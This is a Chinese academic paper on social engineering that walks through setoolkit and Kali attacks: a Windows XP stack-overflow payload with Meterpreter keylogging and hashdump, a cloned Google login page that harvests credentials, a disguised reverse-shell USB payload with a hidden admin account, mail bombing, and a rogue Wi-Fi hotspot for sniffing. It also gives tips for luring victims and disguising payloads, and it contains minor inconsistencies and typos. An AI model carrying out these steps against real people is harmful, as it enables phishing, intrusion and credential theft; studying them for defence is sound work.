摘要:隨著軟硬件的快速發(fā)展,人本在享受物聯(lián)網(wǎng)帶來的簡易生活時(shí),同時(shí)人的信息安全和財(cái)產(chǎn)安全變得更加重要,了解網(wǎng)絡(luò)中的攻擊手段就顯得更為重要,論文基于對社會(huì)工程學(xué)的攻擊原理進(jìn)行分析,采取實(shí)踐應(yīng)用方法,將其攻擊流程和手段展示出來,最終目的是為保護(hù)信息安全提供基本依據(jù)和啟發(fā)。重點(diǎn)介紹了四種生活中普遍見到的社會(huì)工程學(xué)攻擊方式,并通過kalix操作系統(tǒng)和setoolkit攻擊套件進(jìn)行實(shí)踐,給出攻擊方式的理念和方式,并展現(xiàn)其攻擊的多樣化。
關(guān)鍵詞:社會(huì)工程學(xué)攻擊;kali;棧溢出漏洞;網(wǎng)絡(luò)信息安全
中圖分類號(hào):D918;TP393.08????????????文獻(xiàn)標(biāo)識(shí)碼:A
收稿日期:2020-05-22
作者簡介:高小輝(1997-),男,本科,研究方向:信息安全和算法分析。
通過介紹5種社會(huì)工程學(xué)攻擊方式:魚叉攻擊,釣魚攻擊,惡意媒介攻擊,群郵攻擊,展現(xiàn)各自的原理和獨(dú)特的實(shí)驗(yàn)過程,對社會(huì)工程學(xué)和心理學(xué)的共同研究,展現(xiàn)不同的攻擊方式,向網(wǎng)絡(luò)安全人員提供參考,有助于實(shí)現(xiàn)信息安全的靶向治療。
1社會(huì)工程學(xué)的由來與發(fā)展
凱文.米特尼克是被認(rèn)為社會(huì)工程學(xué)的奠基人好,他成功的將心理學(xué)融入其中,利用網(wǎng)民的社會(huì)行為和心里將其弱點(diǎn)暴露出來,讓一些技術(shù)探測工具有機(jī)可乘。
現(xiàn)代社會(huì)工程學(xué)與心理學(xué)能融合進(jìn)一步加深,基于此一系列衍生工具和技術(shù),采用最基本的攻擊方式,攻擊者洞悉網(wǎng)民心理弱點(diǎn),并利用心理弱點(diǎn),繼而一些讓網(wǎng)民遭受巨大財(cái)產(chǎn)損失。
2社會(huì)工程學(xué)攻擊方式
2.1獵奇心理和魚叉式攻擊
當(dāng)人們遇到不知道,不熟悉或比較奇異的事物,常會(huì)不加思考的去接觸此類事物,而截取被攻擊的信息則是利用獵奇心理和較低的防患意識(shí),當(dāng)人去瀏覽網(wǎng)頁和這下載文件,攻擊者事先利用人的獵奇心理,可以對文件名使用關(guān)于黃色,賺取巨額利潤等字眼或者利用當(dāng)下熱點(diǎn)新聞,使被攻擊者主動(dòng)下載危險(xiǎn)附件。危險(xiǎn)附件的制作是基于棧溢出漏洞,由被攻擊者提前制作好或者直接利用被攻擊者系統(tǒng)本身自帶的棧溢出漏洞,這里首先介紹棧溢出漏洞原理和怎樣利用window XP存在的棧溢出漏洞程序來控制被攻擊機(jī)。
棧漏洞溢出是指在棧內(nèi)寫入超出長度的限制數(shù)據(jù),同時(shí)利用緩沖器溢出改寫數(shù)據(jù)和執(zhí)行流程,從而破壞程序的運(yùn)行,獲得系統(tǒng)控制權(quán)的攻擊手段,這里涉及主要三個(gè)寄存器ESP ESP 和EIP.棧指針寄存器(extended?stack?pointer),其內(nèi)存放著一個(gè)指針,該指針永遠(yuǎn)指向系統(tǒng)棧最上面一個(gè)棧幀的棧頂,基址指針寄存器(extended?base?pointer),其內(nèi)存放著一個(gè)指針,該指針永遠(yuǎn)指向系統(tǒng)棧最上面一個(gè)棧幀的底部,EIP寄存器,用來存儲(chǔ)CPU要讀取指令的地址,CPU通過EIP寄存器讀取即將要執(zhí)行的指令。每次CPU執(zhí)行完相應(yīng)的匯編指令之后,EIP寄存器的值就會(huì)增加,如表1所示。
上述步驟生成了一個(gè)內(nèi)部含有攻擊代碼指令的文件,將其發(fā)布到網(wǎng)上,在這里攻擊對象是有Xp用戶下載,當(dāng)用戶下載完畢并打開時(shí)候,kali應(yīng)當(dāng)事先開啟主機(jī)進(jìn)行監(jiān)測。啟動(dòng)配套使用工具msfdb數(shù)據(jù)庫,并進(jìn)入msfconsole控制臺(tái),然后使用句柄設(shè)置載荷模塊,指定攻擊機(jī)的IP和端口,若成功建起攻擊機(jī)和被攻擊機(jī)的會(huì)話,可使用meterpreter模塊來獲得被攻擊機(jī)的系統(tǒng)控制權(quán),例如使用screenshot獲得被控制機(jī)的當(dāng)前屏幕的截圖,使用keycan_start和key_scan_dump獲取被控制機(jī)的鍵盤輸入記錄。另外還可以使用hashdump來獲得密碼的hash值,借助于Johnny進(jìn)行哈希值的破解或者下載彩虹表進(jìn)行攻擊,來取得被攻擊機(jī)的系統(tǒng)密碼。
2.2.釣魚攻擊
釣魚攻擊利用偽造的知名機(jī)構(gòu)來竊取賬戶名及其密碼,利用登陸者的行為慣性和盲目信任。在kali中setoolkit社會(huì)工程學(xué)中有完整的偽造知名網(wǎng)站的能力,現(xiàn)以主機(jī)A(A為公網(wǎng)ip)作為竊取主機(jī),并在此主機(jī)上偽造www.google.com進(jìn)而獲取登陸者的密碼和賬戶。
啟動(dòng)setoolkit后,
第一步:選擇社會(huì)工程學(xué)攻擊,選定Social-Engineering Attacks;
第二步:選擇站點(diǎn)攻擊,選擇Website Attack Vectors;
第三步:選擇機(jī)密信息攻擊,站點(diǎn)克隆,選擇Credential Harvester Attack Method,選擇Site Cloner
Enter the url to clone:http://www.google.com
//這里我們選擇谷歌網(wǎng)站
第四步:配置監(jiān)聽主機(jī)。
IP address for the POST back in Harvester/Tabnabbing?:xxx.xxx.xx.xx
當(dāng)上述工作完成后,登陸者使用A登錄的時(shí)候,監(jiān)聽主機(jī)將獲得此登陸者的用戶名和密碼,如下圖所示:
釣魚攻擊的核心問題:如何使登陸者跳轉(zhuǎn)到一個(gè)自己不認(rèn)識(shí)公網(wǎng)IP?這決定了釣魚攻擊的成敗?,F(xiàn)提出如下解決辦法:(1)對公網(wǎng)IP申請大量相似域名,進(jìn)行公網(wǎng)IP和域名的綁定,這類方法較為耗費(fèi)財(cái)力和人力進(jìn)行維護(hù),可以稱之為撒網(wǎng)式釣魚。(2)購買大量網(wǎng)站流量,來獲得較高的曝光率,有意的進(jìn)行引流,從而在檢索排名靠前,可以稱之為緊縮網(wǎng)口。(3)欺詐郵箱,自動(dòng)將自己主機(jī)相似域名大量轉(zhuǎn)發(fā),適合定向撈魚。(4)以超鏈接的方式,src屬性轉(zhuǎn)向自己的公網(wǎng)IP,而文本內(nèi)容卻是你偽造的網(wǎng)站地址。
2.3.創(chuàng)造惡意傳播媒介
將創(chuàng)造的惡意媒介,利用U盤或附加文件的形式下載到被攻擊機(jī)上,創(chuàng)造的惡意媒主動(dòng)向監(jiān)聽機(jī)建立一個(gè)會(huì)話,使用Meterpreter創(chuàng)造出的攻擊載荷返回一個(gè)控制通道。另外防止被攻擊機(jī)進(jìn)行漏洞處理,可以采用創(chuàng)建影子賬戶,或者創(chuàng)建隱藏賬戶來進(jìn)行權(quán)限維持。
利用setoolkit實(shí)現(xiàn)方式:
第一步:選擇社會(huì)工程學(xué)攻擊。
選擇Social-Engineering Attacks
第二步:選擇創(chuàng)造惡意媒介,選擇逆向tcp連接,選擇Windows Shell Reverse_TCP
設(shè)置監(jiān)聽賬戶:IP address for payload listener:xxx.xxx.xx.xx。
第三步:將生成的payload.exe,autorun等文件進(jìn)行偽裝,發(fā)布到被攻擊的主機(jī)上。
生成文件如下圖所示:
第四步:在被攻擊機(jī)主動(dòng)或被動(dòng)運(yùn)行惡意媒介,攻擊機(jī)獲得被攻擊的控制權(quán),為防止漏洞處理,進(jìn)行創(chuàng)建影子賬戶,分配最高權(quán)限。
添加賬戶:net user username password add。
一個(gè)關(guān)鍵核心問題,怎么偽裝或隱藏載荷文件,較好的方法:(1)利用當(dāng)下熱點(diǎn)新聞,利用網(wǎng)民的從眾心理,進(jìn)行擴(kuò)散式傳播文件。(2)偽裝成正常圖標(biāo),進(jìn)行發(fā)布。發(fā)布的網(wǎng)站一般是不正規(guī)網(wǎng)站,但是持有大量流量,利用網(wǎng)民的占有欲望,麻木警覺。
2.4.群發(fā)郵件攻擊
大規(guī)模郵件攻擊是一種社會(huì)工程攻擊,其中大量的郵件是發(fā)送給受害者,以填滿其電子郵件收件箱和崩潰受害者的郵箱。 當(dāng)一封重要郵件到達(dá)受害者設(shè)備,而受害者并不知道這一點(diǎn)時(shí),攻擊者發(fā)送大量的垃圾郵件,?如果收件箱沒有崩潰,垃圾郵件的發(fā)送量是如此之大,以至于重要的郵件隱藏在垃圾郵件中。 它也被稱為電子轟炸和短信攻擊。
實(shí)現(xiàn)方式:
第一步:選擇社會(huì)工程學(xué)攻擊,選擇Social-Engineering Attacks;
第二步:選擇群發(fā)郵件攻擊,生成郵件賬戶單。選擇Mass Mailer Attack,導(dǎo)入郵件賬戶單,選擇E-mail Attack Mass Mailer,導(dǎo)入路徑Path to the file to import into SET: /xx/xx/file;
第三步:設(shè)置私人個(gè)人賬戶作為發(fā)送郵件的賬戶。
Use a gamil?Account for your email attack
Your gmail email address:xxx@.com
Flag this message/s as high priority?Yes
#設(shè)置郵件優(yōu)先權(quán)為高
Do you want to attach a file - [y/n]: n
Do you want to attach an inline file - [y/n]: n
#這里我們選擇不添加附件,這里的附件經(jīng)常與病毒文件混合在一起,這里我們只是實(shí)現(xiàn)群郵攻擊
Email subject:xxx
Send the message as html or plain? 'h' or 'p' [p]:p
nter?the body of the message, type END (capitals) when finished:xxx
Next line of the body: END
#設(shè)置文件主題和內(nèi)容
第四步:測試群郵攻擊。
被攻擊賬戶郵件如圖,攻擊次數(shù)295次:
2.5?無線接入點(diǎn)引導(dǎo)攻擊
此類攻擊方式利用通過偽裝的wifi熱點(diǎn),通常采用免費(fèi)方式接入,引導(dǎo)人們接入wifi,當(dāng)用戶一旦接入,攻擊者便可截取一些私密信息,它的實(shí)現(xiàn)方式主要依賴于Kali系統(tǒng)三大工具,Airbase-ng,DHCP-server和Ettercap,Airbase-ng主要用于攻擊客戶端,例如,用于在無線接口上啟用和禁用監(jiān)聽模式,DHCP-SERVER用于給接入者分配IP,Ettercap用于嗅探數(shù)據(jù),進(jìn)行中間人攻擊,在實(shí)踐中發(fā)現(xiàn),使用功率更大的無線網(wǎng)卡成功幾率更高,地點(diǎn)一般選擇比較繁華場所,熱點(diǎn)名稱應(yīng)具有誘惑性和迷惑性。
實(shí)現(xiàn)方式:
安裝主要服務(wù)套件 :
安裝dhcp讀?。簊udo apt-get install isc-dhcp-server
對isc-dhcp-server服務(wù)器進(jìn)行基本配置:
配置方面主要涉及子網(wǎng)配置,DHCP和路由配置:
nano -w /etc/dhcp/dhcpd.conf
Default-lease-time 600;
#設(shè)置默認(rèn)租約
max-lease-time 7200;
#設(shè)置最大租約
Ddns-update-style none
Authoritative;
#設(shè)置dhcp服務(wù)器為權(quán)威
Subet?192.168.1.0 netmask?255.255.255.0{
Range 192.168.1.3 192.168.140;
#配置分配ip范圍
Option domain-name-servers 192.168.1.1;
#配置dhcp服務(wù)器的ip地址
Option domain-name ?“example.org”
Option routers 192.168.1.1;
#設(shè)置路由ip,這里保持和dhcp一致。
Option subnet-mask 255.255.255.0;
}
3對外載網(wǎng)卡啟用監(jiān)聽模式,這里使用Ralink?802.11 n WLAN
在啟用前使用檢查airmon是否已經(jīng)開啟,避免沖突,這里直接檢查后直殺死進(jìn)程
airmon-ng ?check
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
672 NetworkManager
1300 wpa_supplicant
airmon-ng ?check kill
Killing these processes
PID Name
_supplicant
4配置橋接網(wǎng)絡(luò)
將wifi熱點(diǎn)廣播,轉(zhuǎn)發(fā)到內(nèi)核網(wǎng)絡(luò)主要配置如下:
sudo ifconfig?at0?192.168.1.1 netmask?255.255.255.0
#設(shè)置有線接口卡at0,并且綁定到路由器
sudo ifconfig?at0 mtu?1400
#設(shè)置接收的數(shù)據(jù)塊大小,不能太小,否則接收異常
sudo route add -net 192.168.1.0 netmask?255.255.255.0 gw 192.168.1.1
#將路由添加到路由表上
sudo sh -c 'sudo echo 1 > /proc/sys/net/ipv4/ip_forward'
#設(shè)置ipv4轉(zhuǎn)發(fā)
sudo iptables?-t nat -A PREROUTING -p udp -j DNAT --to 192.168.43.1
#配置網(wǎng)關(guān)路由
sudo iptables?-P FORWARD ACCEPT
sudo iptables?--append FORWARD --in-interface at0 -j ACCEPT
sudo iptables?--table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
#注意這里設(shè)置外部連接網(wǎng)絡(luò)eth0,這一步有利于實(shí)現(xiàn)更加真實(shí)的欺騙,比如接入者不受感受到網(wǎng)絡(luò)的異常
sudo dhcpd?-cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
5查看欺騙wifi,并行行測試
手機(jī)客戶端掃描的wifi如圖所示,可以看到example.org
當(dāng)連接example.org wifi時(shí),數(shù)據(jù)的劫持如圖所示。
5結(jié)語
社會(huì)工程學(xué)的攻擊方式與心理學(xué)的使用存在彼此關(guān)聯(lián)和聯(lián)系,從上述列舉了典型的社會(huì)工程學(xué)攻擊方式及其實(shí)現(xiàn)方式,社會(huì)工程學(xué)攻擊的實(shí)現(xiàn)的較為容易,但是一些殺毒軟件的防護(hù)愈發(fā)嚴(yán)格,漏斗補(bǔ)丁發(fā)布愈加頻繁,這對社會(huì)工程學(xué)的攻擊方式產(chǎn)生了較大的不利影響,但是從另一方面看,社會(huì)工程學(xué)的攻擊攻擊理念也在不斷改變,從技術(shù)和工具支持,轉(zhuǎn)向偏人的行為研究,并以此為基礎(chǔ),發(fā)展新的社會(huì)工程學(xué)攻擊技術(shù)和工具。
參考文獻(xiàn):
[1]米特尼克,西蒙.反欺騙的藝術(shù)[M]..北京:清華大學(xué)出版社,2014.
[2]李華峰.Kali Linux 2網(wǎng)絡(luò)滲透測試實(shí)踐指南[M],北京:人民郵電出版社,2008.
[3]詹姆斯.F.庫羅斯.計(jì)算機(jī)網(wǎng)絡(luò)自頂向下方法[M].北京:機(jī)械工業(yè)出版社,2018.
Abstract: With the rapid development of software and hardware, when people are enjoying the simple life brought by the Internet of Things, at the same time, peoples information security and property security become more important, and it is more important to understand the attack methods in the network. The paper is based on It analyzes the attack principle of social engineering, adopts a practical application method, and displays its attack process and means. The ultimate goal is to provide basic basis and inspiration for protecting information security. It focuses on the four social engineering attack methods that are commonly seen in life, and is practiced through the kalix?operating system and setoolkit?attack suite. The concepts and methods of the attack methods are given, and the diversity of their attacks is demonstrated.
Key?words: Social engineering attack; Kali; Stack overflow vulnerability; Network information security